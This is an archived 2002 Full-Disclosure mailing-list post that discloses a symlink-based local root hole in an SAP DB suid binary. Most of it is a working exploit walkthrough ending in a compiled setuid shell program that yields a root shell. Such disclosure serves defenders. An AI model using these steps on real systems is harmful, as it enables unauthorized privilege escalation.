[Full-Disclosure] SAP database local root via symlink

From: KF (dotslashat_private)
Date: Wed Dec 04 2002 - 06:57:30 PST

Next message: SGI Security Coordinator: "[Full-Disclosure] Buffer Overflow Vulnerability in X Font Server on IRIX"

Previous message: SGI Security Coordinator: "[Full-Disclosure] Multiple Vulnerabilities in BIND Name Service Daemon on IRIX"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hey folks,
    During an evaluation of the SAP database for linux I located a 
security issue in one of their suid binaries. This issue is a symlink 
attack against a binary that makes an execve call to a file in your 
current directory. The details of this issue are outlined below. You 
should be able to exploit this by hand however I included a simple exploit.

The alert from SAP is located here:
http://www.sapdb.org/sap_db_alert.htm

This code and alert will be added to http://www.snosoft.com/research

-KF

---------

application/x-sh attachment: SAProot.sh

This local attack upon SAP is based on sapdb-server-linux-32bit-i386-7_3_0_29.tgz it is currently unknown if this affects other SAP flavors. [elguapo@rh8 pgm]$ pwd /usr/sapdb/depend/pgm [elguapo@rh8 pgm]$ ls -al lserver -rwsrwxr-x 1 root sapdb 15673 Oct 22 10:42 lserver Using ltrace we can see an attempt to run ./lserversrv via execve() [elguapo@rh8 pgm]$ ltrace ./lserver __libc_start_main(0x08048800, 1, 0xbffff994, 0x08048690, 0x08048a0c <unfinished ...> __register_frame_info(0x0804a0b8, 0x0804a1bc, 0xbffff948, 0x080486b5, 0x4212a2d0) = 0 malloc(10) = 0x0804a200 strcpy(0x0804a200, "./lserver") = 0x0804a200 execv("./lserversrv", 0xbffff994 <unfinished ...> --- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++ The problem with this execve call is that when looking for "./lserversrv" the lserver does not check for any symlinks. The abuser can very easily make his own lserversrv. We are just going to make a directory in /tmp to use for scratch space [elguapo@rh8 pgm]$ cd /tmp [elguapo@rh8 tmp]$ mkdir "snosoft+sapdb=root" [elguapo@rh8 tmp]$ cd "snosoft+sapdb=root" Next we make a symlink to the suid binary lserver [elguapo@rh8 snosoft+sapdb=root]$ ln -s /usr/sapdb/depend/pgm/lserver lserver As we saw above lserver trys to do the following: execv("./lserversrv", 0xbffff994 <unfinished ...> This is easy enough to take advantage of... [elguapo@rh8 snosoft+sapdb=root]$ cp /usr/bin/id lserversrv As you can see we have the euid of root at this point in time... [elguapo@rh8 snosoft+sapdb=root]$ /tmp/snosoft+sapdb\=root/lserver uid=500(elguapo) gid=500(elguapo) euid=0(root) groups=500(elguapo) Finishing up the task is trivial from there... [elguapo@rh8 snosoft+sapdb=root]$ cat > root.c main(){ setuid(0); setgid(0); system("/bin/sh"); } [elguapo@rh8 snosoft+sapdb=root]$ cc -o root root.c [elguapo@rh8 snosoft+sapdb=root]$ cp root lserversrv [elguapo@rh8 snosoft+sapdb=root]$ ./lserver sh-2.05b# id uid=0(root) gid=0(root) groups=500(elguapo) Copyright SNOSoft Inc. 2002 -KF _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: SGI Security Coordinator: "[Full-Disclosure] Buffer Overflow Vulnerability in X Font Server on IRIX"
Previous message: SGI Security Coordinator: "[Full-Disclosure] Multiple Vulnerabilities in BIND Name Service Daemon on IRIX"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Dec 04 2002 - 15:10:34 PST